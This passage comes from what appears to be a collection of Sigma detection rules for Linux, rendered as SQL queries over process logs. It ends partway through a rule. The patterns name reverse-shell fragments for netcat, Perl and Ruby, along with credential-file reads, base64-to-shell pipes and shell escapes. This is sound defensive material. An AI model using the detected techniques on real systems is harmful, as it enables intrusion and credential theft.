        "title": "Linux Network Service Scanning Tools Execution",
        "id": "3e102cd9-a70d-4a7a-9508-403963092f31",
        "description": "Detects execution of network scanning and reconnaisance tools. These tools can be used for the enumeration of local or remote network services for example.",
        "author": "Alejandro Ortuno, oscd.community, Georg Lauenstein (sure[secure])",
        "tags": [
            "attack.discovery",
            "attack.t1046"
        ],
        "falsepositives": [
            "Legitimate administration activities"
        ],
        "level": "low",
        "rule": [
            "SELECT * FROM logs WHERE (((Image LIKE '%/nc' ESCAPE '\\' OR Image LIKE '%/ncat' ESCAPE '\\' OR Image LIKE '%/netcat' ESCAPE '\\' OR Image LIKE '%/socat' ESCAPE '\\') AND NOT ((CommandLine LIKE '% --listen %' ESCAPE '\\' OR CommandLine LIKE '% -l %' ESCAPE '\\'))) OR (Image LIKE '%/autorecon' ESCAPE '\\' OR Image LIKE '%/hping' ESCAPE '\\' OR Image LIKE '%/hping2' ESCAPE '\\' OR Image LIKE '%/hping3' ESCAPE '\\' OR Image LIKE '%/naabu' ESCAPE '\\' OR Image LIKE '%/nmap' ESCAPE '\\' OR Image LIKE '%/nping' ESCAPE '\\' OR Image LIKE '%/telnet' ESCAPE '\\' OR Image LIKE '%/zenmap' ESCAPE '\\'))"
        ],
        "filename": "proc_creation_lnx_susp_network_utilities_execution.yml"
    },
    {
        "title": "Shell Execution via Nice - Linux",
        "id": "093d68c7-762a-42f4-9f46-95e79142571a",
        "description": "Detects the use of the \"nice\" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.\n",
        "author": "Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)",
        "tags": [
            "attack.discovery",
            "attack.t1083"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%/nice' ESCAPE '\\' AND (CommandLine LIKE '%/bin/bash' ESCAPE '\\' OR CommandLine LIKE '%/bin/dash' ESCAPE '\\' OR CommandLine LIKE '%/bin/fish' ESCAPE '\\' OR CommandLine LIKE '%/bin/sh' ESCAPE '\\' OR CommandLine LIKE '%/bin/zsh' ESCAPE '\\'))"
        ],
        "filename": "proc_creation_lnx_nice_shell_execution.yml"
    },
    {
        "title": "Linux Recon Indicators",
        "id": "0cf7a157-8879-41a2-8f55-388dd23746b7",
        "description": "Detects events with patterns found in commands used for reconnaissance on linux systems",
        "author": "Florian Roth (Nextron Systems)",
        "tags": [
            "attack.reconnaissance",
            "attack.t1592.004",
            "attack.credential-access",
            "attack.t1552.001"
        ],
        "falsepositives": [
            "Legitimate administration activities"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE (CommandLine LIKE '% -name .htpasswd%' ESCAPE '\\' OR CommandLine LIKE '% -perm -4000 %' ESCAPE '\\')"
        ],
        "filename": "proc_creation_lnx_susp_recon_indicators.yml"
    },
    {
        "title": "Setuid and Setgid",
        "id": "c21c4eaa-ba2e-419a-92b2-8371703cbe21",
        "description": "Detects suspicious change of file privileges with chown and chmod commands",
        "author": "Ömer Günal",
        "tags": [
            "attack.persistence",
            "attack.t1548.001"
        ],
        "falsepositives": [
            "Legitimate administration activities"
        ],
        "level": "low",
        "rule": [
            "SELECT * FROM logs WHERE (CommandLine LIKE '%chown root%' ESCAPE '\\' AND (CommandLine LIKE '% chmod u+s%' ESCAPE '\\' OR CommandLine LIKE '% chmod g+s%' ESCAPE '\\'))"
        ],
        "filename": "proc_creation_lnx_setgid_setuid.yml"
    },
    {
        "title": "Local System Accounts Discovery - Linux",
        "id": "b45e3d6f-42c6-47d8-a478-df6bd6cf534c",
        "description": "Detects enumeration of local systeam accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.",
        "author": "Alejandro Ortuno, oscd.community, CheraghiMilad",
        "tags": [
            "attack.discovery",
            "attack.t1087.001"
        ],
        "falsepositives": [
            "Legitimate administration activities"
        ],
        "level": "low",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%/lastlog' ESCAPE '\\' OR CommandLine LIKE '%''x:0:''%' ESCAPE '\\' OR ((Image LIKE '%/cat' ESCAPE '\\' OR Image LIKE '%/ed' ESCAPE '\\' OR Image LIKE '%/head' ESCAPE '\\' OR Image LIKE '%/more' ESCAPE '\\' OR Image LIKE '%/nano' ESCAPE '\\' OR Image LIKE '%/tail' ESCAPE '\\' OR Image LIKE '%/vi' ESCAPE '\\' OR Image LIKE '%/vim' ESCAPE '\\' OR Image LIKE '%/less' ESCAPE '\\' OR Image LIKE '%/emacs' ESCAPE '\\' OR Image LIKE '%/sqlite3' ESCAPE '\\' OR Image LIKE '%/makemap' ESCAPE '\\') AND (CommandLine LIKE '%/etc/passwd%' ESCAPE '\\' OR CommandLine LIKE '%/etc/shadow%' ESCAPE '\\' OR CommandLine LIKE '%/etc/sudoers%' ESCAPE '\\' OR CommandLine LIKE '%/etc/spwd.db%' ESCAPE '\\' OR CommandLine LIKE '%/etc/pwd.db%' ESCAPE '\\' OR CommandLine LIKE '%/etc/master.passwd%' ESCAPE '\\')) OR Image LIKE '%/id' ESCAPE '\\' OR (Image LIKE '%/lsof' ESCAPE '\\' AND CommandLine LIKE '%-u%' ESCAPE '\\'))"
        ],
        "filename": "proc_creation_lnx_local_account.yml"
    },
    {
        "title": "ESXi Syslog Configuration Change Via ESXCLI",
        "id": "38eb1dbb-011f-40b1-a126-cf03a0210563",
        "description": "Detects changes to the ESXi syslog configuration via \"esxcli\"",
        "author": "Cedric Maurugeon",
        "tags": [
            "attack.defense-evasion",
            "attack.t1562.001",
            "attack.t1562.003"
        ],
        "falsepositives": [
            "Legitimate administrative activities"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%/esxcli' ESCAPE '\\' AND CommandLine LIKE '%system%' ESCAPE '\\' AND CommandLine LIKE '%syslog%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '% set%' ESCAPE '\\')"
        ],
        "filename": "proc_creation_lnx_esxcli_syslog_config_change.yml"
    },
    {
        "title": "Disable Or Stop Services",
        "id": "de25eeb8-3655-4643-ac3a-b662d3f26b6b",
        "description": "Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services",
        "author": "Nasreddine Bencherchali (Nextron Systems)",
        "tags": [
            "attack.defense-evasion"
        ],
        "falsepositives": [
            "Legitimate administration activities"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE ((Image LIKE '%/service' ESCAPE '\\' OR Image LIKE '%/systemctl' ESCAPE '\\' OR Image LIKE '%/chkconfig' ESCAPE '\\') AND (CommandLine LIKE '%stop%' ESCAPE '\\' OR CommandLine LIKE '%disable%' ESCAPE '\\'))"
        ],
        "filename": "proc_creation_lnx_services_stop_and_disable.yml"
    },
    {
        "title": "Remove Scheduled Cron Task/Job",
        "id": "c2e234de-03a3-41e1-b39a-1e56dc17ba67",
        "description": "Detects usage of the 'crontab' utility to remove the current crontab.\nThis is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible\n",
        "author": "Nasreddine Bencherchali (Nextron Systems)",
        "tags": [
            "attack.defense-evasion"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%crontab' ESCAPE '\\' AND CommandLine LIKE '% -r%' ESCAPE '\\')"
        ],
        "filename": "proc_creation_lnx_crontab_removal.yml"
    },
    {
        "title": "Interactive Bash Suspicious Children",
        "id": "ea3ecad2-db86-4a89-ad0b-132a10d2db55",
        "description": "Detects suspicious interactive bash as a parent to rather uncommon child processes",
        "author": "Florian Roth (Nextron Systems)",
        "tags": [
            "attack.execution",
            "attack.defense-evasion",
            "attack.t1059.004",
            "attack.t1036"
        ],
        "falsepositives": [
            "Legitimate software that uses these patterns"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE (ParentCommandLine = 'bash -i' AND ((CommandLine LIKE '%-c import %' ESCAPE '\\' OR CommandLine LIKE '%base64%' ESCAPE '\\' OR CommandLine LIKE '%pty.spawn%' ESCAPE '\\') OR (Image LIKE '%whoami' ESCAPE '\\' OR Image LIKE '%iptables' ESCAPE '\\' OR Image LIKE '%/ncat' ESCAPE '\\' OR Image LIKE '%/nc' ESCAPE '\\' OR Image LIKE '%/netcat' ESCAPE '\\')))"
        ],
        "filename": "proc_creation_lnx_susp_interactive_bash.yml"
    },
    {
        "title": "Shell Execution via Git - Linux",
        "id": "47b3bbd4-1bf7-48cc-84ab-995362aaa75a",
        "description": "Detects the use of the \"git\" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.\n",
        "author": "Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)",
        "tags": [
            "attack.execution",
            "attack.t1059"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE (ParentImage LIKE '%/git' ESCAPE '\\' AND ParentCommandLine LIKE '% -p %' ESCAPE '\\' AND ParentCommandLine LIKE '%help%' ESCAPE '\\' AND (CommandLine LIKE '%bash 0<&1%' ESCAPE '\\' OR CommandLine LIKE '%dash 0<&1%' ESCAPE '\\' OR CommandLine LIKE '%sh 0<&1%' ESCAPE '\\'))"
        ],
        "filename": "proc_creation_lnx_git_shell_execution.yml"
    },
    {
        "title": "Container Residence Discovery Via Proc Virtual FS",
        "id": "746c86fb-ccda-4816-8997-01386263acc4",
        "description": "Detects potential container discovery via listing of certain kernel features in the \"/proc\" virtual filesystem",
        "tags": [
            "attack.discovery",
            "attack.t1082"
        ],
        "author": "Seth Hanford",
        "falsepositives": [
            "Legitimate system administrator usage of these commands",
            "Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered"
        ],
        "level": "low",
        "rule": [
            "SELECT * FROM logs WHERE ((Image LIKE '%awk' ESCAPE '\\' OR Image LIKE '%/cat' ESCAPE '\\' OR Image LIKE '%grep' ESCAPE '\\' OR Image LIKE '%/head' ESCAPE '\\' OR Image LIKE '%/less' ESCAPE '\\' OR Image LIKE '%/more' ESCAPE '\\' OR Image LIKE '%/nl' ESCAPE '\\' OR Image LIKE '%/tail' ESCAPE '\\') AND (CommandLine LIKE '%/proc/2/%' ESCAPE '\\' OR (CommandLine LIKE '%/proc/%' ESCAPE '\\' AND (CommandLine LIKE '%/cgroup' ESCAPE '\\' OR CommandLine LIKE '%/sched' ESCAPE '\\'))))"
        ],
        "filename": "proc_creation_lnx_susp_container_residence_discovery.yml"
    },
    {
        "title": "Shell Invocation Via Ssh - Linux",
        "id": "8737b7f6-8df3-4bb7-b1da-06019b99b687",
        "description": "Detects the use of the \"ssh\" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.\n",
        "author": "Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)",
        "tags": [
            "attack.execution",
            "attack.t1059"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%/ssh' ESCAPE '\\' AND (CommandLine LIKE '%ProxyCommand=;%' ESCAPE '\\' OR CommandLine LIKE '%permitlocalcommand=yes%' ESCAPE '\\' OR CommandLine LIKE '%localhost%' ESCAPE '\\') AND (CommandLine LIKE '%/bin/bash%' ESCAPE '\\' OR CommandLine LIKE '%/bin/dash%' ESCAPE '\\' OR CommandLine LIKE '%/bin/fish%' ESCAPE '\\' OR CommandLine LIKE '%/bin/sh%' ESCAPE '\\' OR CommandLine LIKE '%/bin/zsh%' ESCAPE '\\' OR CommandLine LIKE '%sh 0<&2 1>&2%' ESCAPE '\\' OR CommandLine LIKE '%sh 1>&2 0<&2%' ESCAPE '\\'))"
        ],
        "filename": "proc_creation_lnx_ssh_shell_execution.yml"
    },
    {
        "title": "Linux Base64 Encoded Pipe to Shell",
        "id": "ba592c6d-6888-43c3-b8c6-689b8fe47337",
        "description": "Detects suspicious process command line that uses base64 encoded input for execution with a shell",
        "author": "pH-T (Nextron Systems)",
        "tags": [
            "attack.defense-evasion",
            "attack.t1140"
        ],
        "falsepositives": [
            "Legitimate administration activities"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE (CommandLine LIKE '%base64 %' ESCAPE '\\' AND ((CommandLine LIKE '%| bash %' ESCAPE '\\' OR CommandLine LIKE '%| sh %' ESCAPE '\\' OR CommandLine LIKE '%|bash %' ESCAPE '\\' OR CommandLine LIKE '%|sh %' ESCAPE '\\') OR (CommandLine LIKE '% |sh' ESCAPE '\\' OR CommandLine LIKE '%| bash' ESCAPE '\\' OR CommandLine LIKE '%| sh' ESCAPE '\\' OR CommandLine LIKE '%|bash' ESCAPE '\\')))"
        ],
        "filename": "proc_creation_lnx_base64_execution.yml"
    },
    {
        "title": "Suspicious Curl File Upload - Linux",
        "id": "00b90cc1-17ec-402c-96ad-3a8117d7a582",
        "description": "Detects a suspicious curl process start the adds a file to a web request",
        "author": "Nasreddine Bencherchali (Nextron Systems), Cedric MAURUGEON (Update)",
        "tags": [
            "attack.exfiltration",
            "attack.t1567",
            "attack.t1105"
        ],
        "falsepositives": [
            "Scripts created by developers and admins"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE ((Image LIKE '%/curl' ESCAPE '\\' AND ((CommandLine LIKE '% --form%' ESCAPE '\\' OR CommandLine LIKE '% --upload-file %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\' OR CommandLine LIKE '% --data-%' ESCAPE '\\') OR CommandLine REGEXP '\\s-[FTd]\\s')) AND NOT (((CommandLine LIKE '%://localhost%' ESCAPE '\\' OR CommandLine LIKE '%://127.0.0.1%' ESCAPE '\\'))))"
        ],
        "filename": "proc_creation_lnx_susp_curl_fileupload.yml"
    },
    {
        "title": "Clipboard Collection with Xclip Tool",
        "id": "ec127035-a636-4b9a-8555-0efd4e59f316",
        "description": "Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n",
        "author": "Pawel Mazur, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC",
        "tags": [
            "attack.collection",
            "attack.t1115"
        ],
        "falsepositives": [
            "Legitimate usage of xclip tools."
        ],
        "level": "low",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%xclip%' ESCAPE '\\' AND CommandLine LIKE '%-sel%' ESCAPE '\\' AND CommandLine LIKE '%clip%' ESCAPE '\\' AND CommandLine LIKE '%-o%' ESCAPE '\\')"
        ],
        "filename": "proc_creation_lnx_clipboard_collection.yml"
    },
    {
        "title": "Sudo Privilege Escalation CVE-2019-14287",
        "id": "f74107df-b6c6-4e80-bf00-4170b658162b",
        "description": "Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287",
        "author": "Florian Roth (Nextron Systems)",
        "tags": [
            "attack.privilege-escalation",
            "attack.t1068",
            "attack.t1548.003",
            "cve.2019-14287"
        ],
        "falsepositives": [
            "Unlikely"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE CommandLine LIKE '% -u#%' ESCAPE '\\'"
        ],
        "filename": "proc_creation_lnx_sudo_cve_2019_14287.yml"
    },
    {
        "title": "Named Pipe Created Via Mkfifo",
        "id": "9d779ce8-5256-4b13-8b6f-b91c602b43f4",
        "description": "Detects the creation of a new named pipe using the \"mkfifo\" utility",
        "author": "Nasreddine Bencherchali (Nextron Systems)",
        "tags": [
            "attack.execution"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "low",
        "rule": [
            "SELECT * FROM logs WHERE Image LIKE '%/mkfifo' ESCAPE '\\'"
        ],
        "filename": "proc_creation_lnx_mkfifo_named_pipe_creation.yml"
    },
    {
        "title": "Shell Execution via Rsync - Linux",
        "id": "e2326866-609f-4015-aea9-7ec634e8aa04",
        "description": "Detects the use of the \"rsync\" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.\n",
        "author": "Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.), Florian Roth",
        "tags": [
            "attack.execution",
            "attack.t1059"
        ],
        "falsepositives": [
            "Legitimate cases in which \"rsync\" is used to execute a shell"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE ((Image LIKE '%/rsync' ESCAPE '\\' OR Image LIKE '%/rsyncd' ESCAPE '\\') AND CommandLine LIKE '% -e %' ESCAPE '\\' AND (CommandLine LIKE '%/ash %' ESCAPE '\\' OR CommandLine LIKE '%/bash %' ESCAPE '\\' OR CommandLine LIKE '%/dash %' ESCAPE '\\' OR CommandLine LIKE '%/csh %' ESCAPE '\\' OR CommandLine LIKE '%/sh %' ESCAPE '\\' OR CommandLine LIKE '%/zsh %' ESCAPE '\\' OR CommandLine LIKE '%/tcsh %' ESCAPE '\\' OR CommandLine LIKE '%/ksh %' ESCAPE '\\' OR CommandLine LIKE '%''ash %' ESCAPE '\\' OR CommandLine LIKE '%''bash %' ESCAPE '\\' OR CommandLine LIKE '%''dash %' ESCAPE '\\' OR CommandLine LIKE '%''csh %' ESCAPE '\\' OR CommandLine LIKE '%''sh %' ESCAPE '\\' OR CommandLine LIKE '%''zsh %' ESCAPE '\\' OR CommandLine LIKE '%''tcsh %' ESCAPE '\\' OR CommandLine LIKE '%''ksh %' ESCAPE '\\'))"
        ],
        "filename": "proc_creation_lnx_rsync_shell_execution.yml"
    },
    {
        "title": "Potential Perl Reverse Shell Execution",
        "id": "259df6bc-003f-4306-9f54-4ff1a08fa38e",
        "description": "Detects execution of the perl binary with the \"-e\" flag and common strings related to potential reverse shell activity",
        "author": "@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)",
        "tags": [
            "attack.execution"
        ],
        "falsepositives": [
            "Unlikely"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE ((Image LIKE '%/perl' ESCAPE '\\' AND CommandLine LIKE '% -e %' ESCAPE '\\') AND ((CommandLine LIKE '%fdopen(%' ESCAPE '\\' AND CommandLine LIKE '%::Socket::INET%' ESCAPE '\\') OR (CommandLine LIKE '%Socket%' ESCAPE '\\' AND CommandLine LIKE '%connect%' ESCAPE '\\' AND CommandLine LIKE '%open%' ESCAPE '\\' AND CommandLine LIKE '%exec%' ESCAPE '\\')))"
        ],
        "filename": "proc_creation_lnx_perl_reverse_shell.yml"
    },
    {
        "title": "Potential Ruby Reverse Shell",
        "id": "b8bdac18-c06e-4016-ac30-221553e74f59",
        "description": "Detects execution of ruby with the \"-e\" flag and calls to \"socket\" related functions. This could be an indication of a potential attempt to setup a reverse shell",
        "author": "@d4ns4n_",
        "tags": [
            "attack.execution"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%ruby%' ESCAPE '\\' AND CommandLine LIKE '% -e%' ESCAPE '\\' AND CommandLine LIKE '%rsocket%' ESCAPE '\\' AND CommandLine LIKE '%TCPSocket%' ESCAPE '\\' AND (CommandLine LIKE '% ash%' ESCAPE '\\' OR CommandLine LIKE '% bash%' ESCAPE '\\' OR CommandLine LIKE '% bsh%' ESCAPE '\\' OR CommandLine LIKE '% csh%' ESCAPE '\\' OR CommandLine LIKE '% ksh%' ESCAPE '\\' OR CommandLine LIKE '% pdksh%' ESCAPE '\\' OR CommandLine LIKE '% sh%' ESCAPE '\\' OR CommandLine LIKE '% tcsh%' ESCAPE '\\'))"
        ],
        "filename": "proc_creation_lnx_ruby_reverse_shell.yml"
    },
    {
        "title": "Remote Access Tool - Team Viewer Session Started On Linux Host",
        "id": "1f6b8cd4-3e60-47cc-b282-5aa1cbc9182d",
        "description": "Detects the command line executed when TeamViewer starts a session started by a remote host.\nOnce a connection has been started, an investigator can verify the connection details by viewing the \"incoming_connections.txt\" log file in the TeamViewer folder.\n",
        "author": "Josh Nickels, Qi Nan",
        "tags": [
            "attack.initial-access",
            "attack.t1133"
        ],
        "falsepositives": [
            "Legitimate usage of TeamViewer"
        ],
        "level": "low",
        "rule": [
            "SELECT * FROM logs WHERE (ParentImage LIKE '%/TeamViewer\\_Service' ESCAPE '\\' AND Image LIKE '%/TeamViewer\\_Desktop' ESCAPE '\\' AND CommandLine LIKE '%/TeamViewer\\_Desktop --IPCport 5939 --Module 1' ESCAPE '\\')"
        ],
        "filename": "proc_creation_lnx_remote_access_tools_teamviewer_incoming_connection.yml"
    },
    {
        "title": "Inline Python Execution - Spawn Shell Via OS System Library",
        "id": "2d2f44ff-4611-4778-a8fc-323a0e9850cc",
        "description": "Detects execution of inline Python code via the \"-c\" in order to call the \"system\" function from the \"os\" library, and spawn a shell.\n",
        "author": "Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)",
        "tags": [
            "attack.execution",
            "attack.t1059"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE (((Image LIKE '%/python' ESCAPE '\\' OR Image LIKE '%/python2' ESCAPE '\\' OR Image LIKE '%/python3' ESCAPE '\\') OR (Image LIKE '%/python2.%' ESCAPE '\\' OR Image LIKE '%/python3.%' ESCAPE '\\')) AND (CommandLine LIKE '% -c %' ESCAPE '\\' AND CommandLine LIKE '%os.system(%' ESCAPE '\\' AND (CommandLine LIKE '%/bin/bash%' ESCAPE '\\' OR CommandLine LIKE '%/bin/dash%' ESCAPE '\\' OR CommandLine LIKE '%/bin/fish%' ESCAPE '\\' OR CommandLine LIKE '%/bin/sh%' ESCAPE '\\' OR CommandLine LIKE '%/bin/zsh%' ESCAPE '\\')))"
        ],
        "filename": "proc_creation_lnx_python_shell_os_system.yml"
    },
    {
        "title": "OMIGOD SCX RunAsProvider ExecuteScript",
        "id": "6eea1bf6-f8d2-488a-a742-e6ef6c1b67db",
        "description": "Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell.\nScript being executed gets created as a temp file in /tmp folder with a scx* prefix.\nThen it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/.\nThe file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including\nMicrosoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite.\n",
        "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC",
        "tags": [
            "attack.privilege-escalation",
            "attack.initial-access",
            "attack.execution",
            "attack.t1068",
            "attack.t1190",
            "attack.t1203"
        ],
        "falsepositives": [
            "Legitimate use of SCX RunAsProvider ExecuteScript."
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE (User = 'root' AND LogonId = '0' AND CurrentDirectory = '/var/opt/microsoft/scx/tmp' AND CommandLine LIKE '%/etc/opt/microsoft/scx/conf/tmpdir/scx%' ESCAPE '\\')"
        ],
        "filename": "proc_creation_lnx_omigod_scx_runasprovider_executescript.yml"
    },
    {
        "title": "Potential Netcat Reverse Shell Execution",
        "id": "7f734ed0-4f47-46c0-837f-6ee62505abd9",
        "description": "Detects execution of netcat with the \"-e\" flag followed by common shells. This could be a sign of a potential reverse shell setup.",
        "author": "@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)",
        "tags": [
            "attack.execution",
            "attack.t1059"
        ],
        "falsepositives": [
            "Unlikely"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE ((Image LIKE '%/nc' ESCAPE '\\' OR Image LIKE '%/ncat' ESCAPE '\\') AND (CommandLine LIKE '% -c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\') AND (CommandLine LIKE '% ash%' ESCAPE '\\' OR CommandLine LIKE '% bash%' ESCAPE '\\' OR CommandLine LIKE '% bsh%' ESCAPE '\\' OR CommandLine LIKE '% csh%' ESCAPE '\\' OR CommandLine LIKE '% ksh%' ESCAPE '\\' OR CommandLine LIKE '% pdksh%' ESCAPE '\\' OR CommandLine LIKE '% sh%' ESCAPE '\\' OR CommandLine LIKE '% tcsh%' ESCAPE '\\' OR CommandLine LIKE '%/bin/ash%' ESCAPE '\\' OR CommandLine LIKE '%/bin/bash%' ESCAPE '\\' OR CommandLine LIKE '%/bin/bsh%' ESCAPE '\\' OR CommandLine LIKE '%/bin/csh%' ESCAPE '\\' OR CommandLine LIKE '%/bin/ksh%' ESCAPE '\\' OR CommandLine LIKE '%/bin/pdksh%' ESCAPE '\\' OR CommandLine LIKE '%/bin/sh%' ESCAPE '\\' OR CommandLine LIKE '%/bin/tcsh%' ESCAPE '\\' OR CommandLine LIKE '%/bin/zsh%' ESCAPE '\\' OR CommandLine LIKE '%$IFSash%' ESCAPE '\\' OR CommandLine LIKE '%$IFSbash%' ESCAPE '\\' OR CommandLine LIKE '%$IFSbsh%' ESCAPE '\\' OR CommandLine LIKE '%$IFScsh%' ESCAPE '\\' OR CommandLine LIKE '%$IFSksh%' ESCAPE '\\' OR CommandLine LIKE '%$IFSpdksh%' ESCAPE '\\' OR CommandLine LIKE '%$IFSsh%' ESCAPE '\\' OR CommandLine LIKE '%$IFStcsh%' ESCAPE '\\' OR CommandLine LIKE '%$IFSzsh%' ESCAPE '\\'))"
        ],
        "filename": "proc_creation_lnx_netcat_reverse_shell.yml"
    },
    {
        "title": "Suspicious Nohup Execution",
        "id": "457df417-8b9d-4912-85f3-9dbda39c3645",
        "description": "Detects execution of binaries located in potentially suspicious locations via \"nohup\"",
        "author": "Joseliyo Sanchez, @Joseliyo_Jstnk",
        "tags": [
            "attack.execution"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "high",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%/nohup' ESCAPE '\\' AND CommandLine LIKE '%/tmp/%' ESCAPE '\\')"
        ],
        "filename": "proc_creation_lnx_nohup_susp_execution.yml"
    },
    {
        "title": "Suspicious Git Clone - Linux",
        "id": "cfec9d29-64ec-4a0f-9ffe-0fdb856d5446",
        "description": "Detects execution of \"git\" in order to clone a remote repository that contain suspicious keywords which might be suspicious",
        "author": "Nasreddine Bencherchali (Nextron Systems)",
        "tags": [
            "attack.reconnaissance",
            "attack.t1593.003"
        ],
        "falsepositives": [
            "Unknown"
        ],
        "level": "medium",
        "rule": [
            "SELECT * FROM logs WHERE (Image LIKE '%/git' ESCAPE '\\' AND CommandLine LIKE '% clone %' ESCAPE '\\' AND (CommandLine LIKE '%exploit%' ESCAPE '\\' OR CommandLine LIKE '%Vulns%' ESCAPE '\\' OR CommandLine LIKE '%vulnerability%' ESCAPE '\\' OR CommandLine LIKE '%RCE%' ESCAPE '\\' OR CommandLine LIKE '%RemoteCodeExecution%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%CVE-%' ESCAPE '\\' OR CommandLine LIKE '%poc-%' ESCAPE '\\' OR CommandLine LIKE '%ProofOfConcept%' ESCAPE '\\' OR CommandLine LIKE '%proxyshell%' ESCAPE '\\' OR CommandLine LIKE '%log4shell%' ESCAPE '\\' OR CommandLine LIKE '%eternalblue%' ESCAPE '\\' OR CommandLine LIKE '%eternal-blue%' ESCAPE '\\' OR CommandLine LIKE '%MS17-%' ESCAPE '\\'))"
        ],
        "filename": "proc_creation_lnx_susp_git_clone.yml"
    },
    {
        "title": "System Network Discovery - Linux",
        "id": "e7bd1cfa-b446-4c88-8afb-403bcd79e3fa",
        "description": "Detects enumeration of local network configuration",
        "author": "Ömer Günal and remotephone, oscd.community",
        "tags": [
            "attack.discovery",
            "attack.t1016"
        ],
        "falsepositives": [
            "Legitimate administration activities"
        ],
        "level": "informational",
        "rule": [
            "SELECT * FROM logs WHERE ((Image LIKE '%/firewall-cmd' ESCAPE '\\' OR Image LIKE '%/ufw' ESCAPE '\\' OR Image LIKE '%/iptables' ESCAPE '\\' OR Image LIKE '%/netstat' ESCAPE '\\' OR Image LIKE '%/ss' ESCAPE '\\' OR Image LIKE '%/ip' ESCAPE '\\' OR Image LIKE '%/ifconfig' ESCAPE '\\' OR Image LIKE '%/systemd-resolve' ESCAPE '\\' OR Image LIKE '%/route' ESCAPE '\\') OR CommandLine LIKE '%/etc/resolv.conf%' ESCAPE '\\')"
        ],
        "filename": "proc_creation_lnx_system_network_discovery.yml"
    },
    {
        "title": "Linux HackTool Execution",
        "id": "a015e032-146d-4717-8944-7a1884122111",
        "description": "Detects known hacktool execution based on image name.",
        "author": "Nasreddine Bencherchali (Nextron Systems), Georg Lauenstein (sure[secure])",
        "tags": [
            "attack.execution",
            "attack.resource-development",
            "attack.t1587"
        ],
        "falsepositives": [
            "Unlikely"
        ],
        "level": "high",
        "rule": [
